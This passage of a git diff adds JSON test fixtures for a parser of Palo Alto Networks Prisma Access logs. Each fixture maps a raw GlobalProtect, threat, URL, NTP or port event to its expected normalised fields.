+    },
+    "host": {
+      "mac": "11.22.33.44.55.66",
+      "name": "Test-device",
+      "os": {
+        "version": "1.0.0"
+      }
+    },
+    "log": {
+      "hostname": "DN-TEST-F2",
+      "level": "Low",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "web-browsing"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "Untrust"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "DTT"
+        }
+      },
+      "name": "DN-TEST-F2",
+      "product": "PAN-OS",
+      "serial_number": "007954000XXXXXX"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "999",
+      "DGHierarchyLevel2": "1111",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "DirectionOfAttack": "server to client",
+      "Threat_ContentType": "file",
+      "URLCategory": "business-and-economy",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "ip": [
+        "2.2.1.6",
+        "4.3.2.1",
+        "5.2.1.8"
+      ]
+    },
+    "rule": {
+      "name": "Guest_Mobile_Internet Access",
+      "uuid": "6935060f-6443-4257-91f8"
+    },
+    "source": {
+      "address": "4.3.2.1",
+      "ip": "4.3.2.1",
+      "nat": {
+        "ip": "2.2.1.6",
+        "port": 22408
+      },
+      "port": 42222
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json
new file mode 100644
index 000000000..25db7ff0a
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json	
@@ -0,0 +1,73 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\":\"2024-07-08T09:01:14.000000Z\",\"DeviceSN\":\"00795700000000\",\"LogType\":\"GLOBALPROTECT\",\"Subtype\":\"globalprotect\",\"LogSubtype\":\"globalprotect\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T09:01:14.000000Z\",\"VirtualSystem\":\"vsys1\",\"EventIDValue\":\"gateway-logout\",\"Stage\":\"logout\",\"AuthMethod\":null,\"TunnelType\":null,\"SourceUserName\":\"joe.doe@test.com\",\"SourceRegion\":\"1.0.0.0-1.255.255.255\",\"EndpointDeviceName\":\"LNL-test\",\"PublicIPv4\":\"1.5.7.3\",\"PublicIPv6\":\"\",\"PrivateIPv4\":\"1.2.3.4\",\"PrivateIPv6\":\"\",\"HostID\":\"e4f14dfd-bd3c-40e5-9c4e\",\"EndpointSN\":\"5CD4153333\",\"GlobalProtectClientVersion\":\"0.0.-1\",\"EndpointOSType\":\"Windows\",\"EndpointOSVersion\":\"Microsoft Windows 11 Enterprise , 64-bit\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"QuarantineReason\":null,\"ConnectionError\":null,\"Description\":\"client logout\",\"EventStatus\":\"success\",\"GlobalProtectGatewayLocation\":null,\"LoginDuration\":3625,\"ConnectionMethod\":null,\"ConnectionErrorID\":0,\"Portal\":\"Internal_test\",\"SequenceNo\":7359635570821640000,\"TimeGeneratedHighResolution\":\"2024-07-08T09:01:14.449000Z\",\"GatewaySelectionType\":\"\",\"SSLResponseTime\":-1,\"GatewayPriority\":null,\"AttemptedGateways\":null,\"Gateway\":null,\"DGHierarchyLevel1\":556,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DG-test\",\"VirtualSystemID\":1}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"TimeReceived\":\"2024-07-08T09:01:14.000000Z\",\"DeviceSN\":\"00795700000000\",\"LogType\":\"GLOBALPROTECT\",\"Subtype\":\"globalprotect\",\"LogSubtype\":\"globalprotect\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T09:01:14.000000Z\",\"VirtualSystem\":\"vsys1\",\"EventIDValue\":\"gateway-logout\",\"Stage\":\"logout\",\"AuthMethod\":null,\"TunnelType\":null,\"SourceUserName\":\"joe.doe@test.com\",\"SourceRegion\":\"1.0.0.0-1.255.255.255\",\"EndpointDeviceName\":\"LNL-test\",\"PublicIPv4\":\"1.5.7.3\",\"PublicIPv6\":\"\",\"PrivateIPv4\":\"1.2.3.4\",\"PrivateIPv6\":\"\",\"HostID\":\"e4f14dfd-bd3c-40e5-9c4e\",\"EndpointSN\":\"5CD4153333\",\"GlobalProtectClientVersion\":\"0.0.-1\",\"EndpointOSType\":\"Windows\",\"EndpointOSVersion\":\"Microsoft Windows 11 Enterprise , 64-bit\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"QuarantineReason\":null,\"ConnectionError\":null,\"Description\":\"client logout\",\"EventStatus\":\"success\",\"GlobalProtectGatewayLocation\":null,\"LoginDuration\":3625,\"ConnectionMethod\":null,\"ConnectionErrorID\":0,\"Portal\":\"Internal_test\",\"SequenceNo\":7359635570821640000,\"TimeGeneratedHighResolution\":\"2024-07-08T09:01:14.449000Z\",\"GatewaySelectionType\":\"\",\"SSLResponseTime\":-1,\"GatewayPriority\":null,\"AttemptedGateways\":null,\"Gateway\":null,\"DGHierarchyLevel1\":556,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DG-test\",\"VirtualSystemID\":1}",
+    "event": {
+      "category": [
+        "session"
+      ],
+      "dataset": "globalprotect",
+      "reason": "client logout",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-07-08T09:01:14Z",
+    "action": {
+      "type": "globalprotect"
+    },
+    "host": {
+      "name": "LNL-test"
+    },
+    "log": {
+      "hostname": "DG-test",
+      "logger": "globalprotect"
+    },
+    "observer": {
+      "name": "DG-test",
+      "product": "PAN-OS",
+      "serial_number": "00795700000000",
+      "version": "0.0.-1"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "556",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "globalprotect",
+      "VirtualSystemID": "1",
+      "connection": {
+        "stage": "logout"
+      },
+      "source": {
+        "private": {
+          "ip": "1.2.3.4"
+        },
+        "region": "1.0.0.0-1.255.255.255"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.5.7.3"
+      ],
+      "user": [
+        "joe.doe@test.com"
+      ]
+    },
+    "source": {
+      "address": "1.5.7.3",
+      "ip": "1.5.7.3",
+      "user": {
+        "name": "joe.doe@test.com"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json
new file mode 100644
index 000000000..c3d742b70
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json	
@@ -0,0 +1,93 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\":\"2024-07-08T08:55:38.000000Z\",\"DeviceSN\":\"007954000370000\",\"LogType\":\"THREAT\",\"Subtype\":\"vulnerability\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T15:52:09.000000Z\",\"SourceAddress\":\"1.2.1.3\",\"DestinationAddress\":\"2.2.1.4\",\"NATSource\":\"\",\"NATDestination\":\"\",\"Rule\":\"Public_TTT_Mgmt\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"ssh\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"TTT\",\"InboundInterface\":\"ethernet1/8\",\"OutboundInterface\":\"ethernet1/4.124\",\"LogSetting\":\"test_setting\",\"SessionID\":72837,\"RepeatCount\":1,\"SourcePort\":52000,\"DestinationPort\":21,\"NATSourcePort\":0,\"NATDestinationPort\":0,\"Protocol\":\"tcp\",\"Action\":\"reset-both\",\"FileName\":null,\"ThreatID\":\"SSH User Authentication Brute Force Attempt(40015)\",\"VendorSeverity\":\"High\",\"DirectionOfAttack\":\"client to server\",\"SequenceNo\":7350395687601,\"SourceLocation\":\"1.0.0.0-1.255.255.255\",\"DestinationLocation\":\"ID\",\"PacketID\":12103464791027,\"FileHash\":null,\"ApplianceOrCloud\":null,\"URLCounter\":0,\"FileType\":null,\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":0,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":1169,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"brute-force\",\"ContentVersion\":\"581116536\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"496a138d-6515-4043-b7c7\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2024-07-08T15:52:09.934000Z\",\"NSSAINetworkSliceType\":null}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"TimeReceived\":\"2024-07-08T08:55:38.000000Z\",\"DeviceSN\":\"007954000370000\",\"LogType\":\"THREAT\",\"Subtype\":\"vulnerability\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T15:52:09.000000Z\",\"SourceAddress\":\"1.2.1.3\",\"DestinationAddress\":\"2.2.1.4\",\"NATSource\":\"\",\"NATDestination\":\"\",\"Rule\":\"Public_TTT_Mgmt\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"ssh\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"TTT\",\"InboundInterface\":\"ethernet1/8\",\"OutboundInterface\":\"ethernet1/4.124\",\"LogSetting\":\"test_setting\",\"SessionID\":72837,\"RepeatCount\":1,\"SourcePort\":52000,\"DestinationPort\":21,\"NATSourcePort\":0,\"NATDestinationPort\":0,\"Protocol\":\"tcp\",\"Action\":\"reset-both\",\"FileName\":null,\"ThreatID\":\"SSH User Authentication Brute Force Attempt(40015)\",\"VendorSeverity\":\"High\",\"DirectionOfAttack\":\"client to server\",\"SequenceNo\":7350395687601,\"SourceLocation\":\"1.0.0.0-1.255.255.255\",\"DestinationLocation\":\"ID\",\"PacketID\":12103464791027,\"FileHash\":null,\"ApplianceOrCloud\":null,\"URLCounter\":0,\"FileType\":null,\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":0,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":1169,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"brute-force\",\"ContentVersion\":\"581116536\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"496a138d-6515-4043-b7c7\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2024-07-08T15:52:09.934000Z\",\"NSSAINetworkSliceType\":null}",
+    "event": {
+      "action": "reset-both",
+      "category": [
+        "vulnerability"
+      ],
+      "dataset": "threat",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-07-08T15:52:09Z",
+    "action": {
+      "name": "reset-both",
+      "outcome": "success",
+      "type": "vulnerability"
+    },
+    "destination": {
+      "address": "2.2.1.4",
+      "geo": {
+        "country_iso_code": "ID"
+      },
+      "ip": "2.2.1.4",
+      "nat": {
+        "port": 0
+      },
+      "port": 21
+    },
+    "log": {
+      "hostname": "DN-TEST",
+      "level": "High",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "ssh"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "TTT"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "Trust"
+        }
+      },
+      "name": "DN-TEST",
+      "product": "PAN-OS",
+      "serial_number": "007954000370000"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "997",
+      "DGHierarchyLevel2": "1169",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "DirectionOfAttack": "client to server",
+      "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys1",
+      "threat": {
+        "category": "brute-force",
+        "id": "SSH User Authentication Brute Force Attempt(40015)"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.1.3",
+        "2.2.1.4"
+      ]
+    },
+    "rule": {
+      "name": "Public_TTT_Mgmt",
+      "uuid": "496a138d-6515-4043-b7c7"
+    },
+    "source": {
+      "address": "1.2.1.3",
+      "ip": "1.2.1.3",
+      "port": 52000
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json
new file mode 100644
index 000000000..b4a75c57c
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json	
@@ -0,0 +1,111 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\":\"2024-07-08T06:17:04.000000Z\",\"DeviceSN\":\"00795400037XXXX\",\"LogType\":\"THREAT\",\"Subtype\":\"url\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T13:13:27.000000Z\",\"SourceAddress\":\"19.16.1.6\",\"DestinationAddress\":\"17.25.11.9\",\"NATSource\":\"210.210.140.61\",\"NATDestination\":\"17.25.11.9\",\"Rule\":\"Guest_Mobile_Internet Access\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"ssl\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"TTT\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/6.997\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Test_setting\",\"SessionID\":816808,\"RepeatCount\":1,\"SourcePort\":35000,\"DestinationPort\":443,\"NATSourcePort\":28500,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"alert\",\"URL\":\"test.gstatic.com/\",\"URLCategory\":\"computer-and-internet-info\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"client to server\",\"SequenceNo\":73503956876009,\"SourceLocation\":\"19.18.0.0-19.18.255.255\",\"DestinationLocation\":\"US\",\"ContentType\":null,\"PacketID\":0,\"URLCounter\":0,\"UserAgent\":null,\"X-Forwarded-For\":null,\"Referer\":null,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":1169,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST\",\"SourceUUID\":null,\"DestinationUUID\":null,\"HTTPMethod\":\"unknown\",\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"InlineMLVerdict\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":0,\"HTTPHeaders\":null,\"URLCategoryList\":\"computer-and-internet-info,low-risk\",\"RuleUUID\":\"6935060f-6443-4257\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-07-08T13:13:27.233000Z\",\"NSSAINetworkSliceType\":null}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"TimeReceived\":\"2024-07-08T06:17:04.000000Z\",\"DeviceSN\":\"00795400037XXXX\",\"LogType\":\"THREAT\",\"Subtype\":\"url\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T13:13:27.000000Z\",\"SourceAddress\":\"19.16.1.6\",\"DestinationAddress\":\"17.25.11.9\",\"NATSource\":\"210.210.140.61\",\"NATDestination\":\"17.25.11.9\",\"Rule\":\"Guest_Mobile_Internet Access\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"ssl\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"TTT\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/6.997\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Test_setting\",\"SessionID\":816808,\"RepeatCount\":1,\"SourcePort\":35000,\"DestinationPort\":443,\"NATSourcePort\":28500,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"alert\",\"URL\":\"test.gstatic.com/\",\"URLCategory\":\"computer-and-internet-info\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"client to server\",\"SequenceNo\":73503956876009,\"SourceLocation\":\"19.18.0.0-19.18.255.255\",\"DestinationLocation\":\"US\",\"ContentType\":null,\"PacketID\":0,\"URLCounter\":0,\"UserAgent\":null,\"X-Forwarded-For\":null,\"Referer\":null,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":1169,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST\",\"SourceUUID\":null,\"DestinationUUID\":null,\"HTTPMethod\":\"unknown\",\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"InlineMLVerdict\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":0,\"HTTPHeaders\":null,\"URLCategoryList\":\"computer-and-internet-info,low-risk\",\"RuleUUID\":\"6935060f-6443-4257\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-07-08T13:13:27.233000Z\",\"NSSAINetworkSliceType\":null}",
+    "event": {
+      "action": "alert",
+      "category": [
+        "network"
+      ],
+      "dataset": "threat",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-07-08T13:13:27Z",
+    "action": {
+      "name": "alert",
+      "outcome": "success",
+      "type": "url"
+    },
+    "destination": {
+      "address": "17.25.11.9",
+      "domain": "test.gstatic.com",
+      "geo": {
+        "country_iso_code": "US"
+      },
+      "ip": "17.25.11.9",
+      "nat": {
+        "ip": "17.25.11.9",
+        "port": 443
+      },
+      "port": 443
+    },
+    "log": {
+      "hostname": "DN-TEST",
+      "level": "Informational",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "ssl"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "Untrust"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "TTT"
+        }
+      },
+      "name": "DN-TEST",
+      "product": "PAN-OS",
+      "serial_number": "00795400037XXXX"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "997",
+      "DGHierarchyLevel2": "1169",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "DirectionOfAttack": "client to server",
+      "Threat_ContentType": "url",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "hosts": [
+        "test.gstatic.com"
+      ],
+      "ip": [
+        "17.25.11.9",
+        "19.16.1.6",
+        "210.210.140.61"
+      ]
+    },
+    "rule": {
+      "name": "Guest_Mobile_Internet Access",
+      "uuid": "6935060f-6443-4257"
+    },
+    "source": {
+      "address": "19.16.1.6",
+      "ip": "19.16.1.6",
+      "nat": {
+        "ip": "210.210.140.61",
+        "port": 28500
+      },
+      "port": 35000
+    },
+    "threat": {
+      "indicator": {
+        "name": "test.gstatic.com/"
+      }
+    },
+    "url": {
+      "domain": "test.gstatic.com",
+      "registered_domain": "gstatic.com",
+      "subdomain": "test",
+      "top_level_domain": "com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json
new file mode 100644
index 000000000..a470b3176
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json	
@@ -0,0 +1,42 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T15:46:40.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"ntpd\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:46:33.000000Z\",\"VirtualLocation\":null,\"EventName\":\"sync\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"NTP sync to server de.pool.ntp.org\",\"SequenceNo\":7200776623254143145,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:46:33.917000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T15:46:40.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"ntpd\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:46:33.000000Z\",\"VirtualLocation\":null,\"EventName\":\"sync\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"NTP sync to server de.pool.ntp.org\",\"SequenceNo\":7200776623254143145,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:46:33.917000Z\"}\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "NTP sync to server de.pool.ntp.org",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:46:33Z",
+    "action": {
+      "type": "ntpd"
+    },
+    "destination": {
+      "address": "de.pool.ntp.org"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "ntpd"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json
new file mode 100644
index 000000000..af31efa35
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json	
@@ -0,0 +1,46 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"port\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:50.000000Z\",\"VirtualLocation\":null,\"EventName\":\"link-change\",\"EventComponent\":\"ethernet1/2\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Port ethernet1/2: Up   10Gb/s-full duplex\",\"SequenceNo\":7200776623254143073,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:50.851000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"port\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:50.000000Z\",\"VirtualLocation\":null,\"EventName\":\"link-change\",\"EventComponent\":\"ethernet1/2\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Port ethernet1/2: Up   10Gb/s-full duplex\",\"SequenceNo\":7200776623254143073,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:50.851000Z\"}\n",
+    "event": {
+      "action": "Up",
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "Port ethernet1/2: Up   10Gb/s-full duplex",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:31:50Z",
+    "action": {
+      "name": "Up",
+      "type": "port"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "ingress": {
+        "interface": {
+          "name": "ethernet1/2"
+        }
+      },
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "port"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json
new file mode 100644
index 000000000..c9ebd467e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json	
@@ -0,0 +1,51 @@
+{
+  "input": {
